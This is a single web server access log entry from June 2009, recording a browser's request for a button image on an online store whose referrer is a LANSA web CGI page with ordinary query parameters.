66.233.122.231 - - [20/Jun/2009:00:47:55 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
